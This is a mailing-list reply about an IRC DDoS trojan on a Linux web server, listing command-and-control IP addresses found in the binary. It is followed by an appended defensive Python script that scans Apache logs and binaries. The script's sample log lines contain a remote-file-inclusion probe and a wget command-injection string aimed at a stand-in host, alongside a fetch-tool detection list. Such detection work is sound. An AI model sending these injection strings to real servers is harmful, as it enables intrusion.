
Re: [Full-disclosure] Trojan found on Linux server



Niek wrote:
> This is a much seen thing these days.
> Your customer probably got attacked by an insecure php script (cacti/xmlphp/awstats/etc.). Check your apache logs.
> If I grep my logs for wget, I see tons of attempts.

Roger that. It wasn't important enough to us to pursue. I just recently signed on with this customer and was in the process of moving their websites over to new, freshly installed servers from the Red Hat Linux 9 boxes they were running on. Since we're about to rebuild the server anyway, it wasn't worth the time to pursue.


> The trojan is an IRC drone, listening for DDoS commands/etc.

Yep, when running "strings" on it I noticed a few IP addresses (219.133.46.212, 61.211.239.84, 64.239.9.236) in there as well as commands indicative of IRC ("NOTICE", "NICK", "PRIVMSG", etc.)


-j

--
Jeremy L. Gaddis, GCWN, Linux+, Network+
LinuxWiz Consulting
http://www.linuxwiz.net/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
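As an added defensive example (not code from the thread or from either poster), a small Python script that does the two checks discussed above: flagging Apache access-log requests whose target carries a fetch command (wget/curl) or a remote URL in a query parameter, and a quick strings-style triage of a suspected binary for IRC protocol verbs and dotted IP addresses. The log lines, the byte blob, the example.invalid host and the 203.0.113.x/198.51.100.x/192.0.2.x addresses are constructed test data.

```python
import re
from urllib.parse import unquote

# Apache "combined"/"common" log line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Substrings in a decoded request target that indicate an attempt to make the
# web server download or run something (the "grep for wget" check in the thread).
FETCH_MARKERS = ("wget ", "wget\t", "curl ", "fetch ", "lwp-download")

def flag_fetch_attempts(lines):
    """Return (client_ip, status, decoded_target) for suspicious requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not access-log entries
        target = unquote(m.group("target"))  # undo %20, %2F, ... before matching
        lowered = target.lower()
        # A parameter whose value is an absolute URL: classic remote-file-inclusion probe.
        rfi = re.search(r'[?&][^=]+=https?://', lowered) is not None
        fetch = any(marker in lowered for marker in FETCH_MARKERS)
        if rfi or fetch:
            hits.append((m.group("ip"), m.group("status"), target))
    return hits

# Strings-style triage of a binary: IRC verbs and dotted IPs, as seen with "strings".
IRC_VERBS = (b"NICK ", b"PRIVMSG ", b"NOTICE ", b"JOIN ")
IP_RE = re.compile(rb'\b(?:\d{1,3}\.){3}\d{1,3}\b')

def irc_indicators(blob):
    """Return (irc_verbs_found, sorted_unique_ips) for a raw file image."""
    verbs = [v.decode().strip() for v in IRC_VERBS if v in blob]
    ips = sorted({ip.decode() for ip in IP_RE.findall(blob)})
    return verbs, ips

# Constructed sample data (not real log lines or a real binary).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2005:03:12:44 +0000] "GET /index.php?page=http://example.invalid/c.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2005:03:12:45 +0000] "GET /cgi-bin/tool.cgi?cmd=wget%20http%3A%2F%2Fexample.invalid%2Fb HTTP/1.1" 200 88',
    '198.51.100.7 - - [10/Jan/2005:03:13:01 +0000] "GET /about.html HTTP/1.1" 200 2048',
]
SAMPLE_BLOB = b"\x7fELF\x00\x00junk\x00NICK \x00PRIVMSG \x00USER \x00192.0.2.44\x00192.0.2.44\x00"

if __name__ == "__main__":
    for ip, status, target in flag_fetch_attempts(SAMPLE_LOG):
        print(f"suspicious: {ip} -> {status} {target}")
    print("irc indicators:", irc_indicators(SAMPLE_BLOB))
```

A 200 status on a flagged request is the line worth investigating first, since it means the script answered the probe rather than rejecting it.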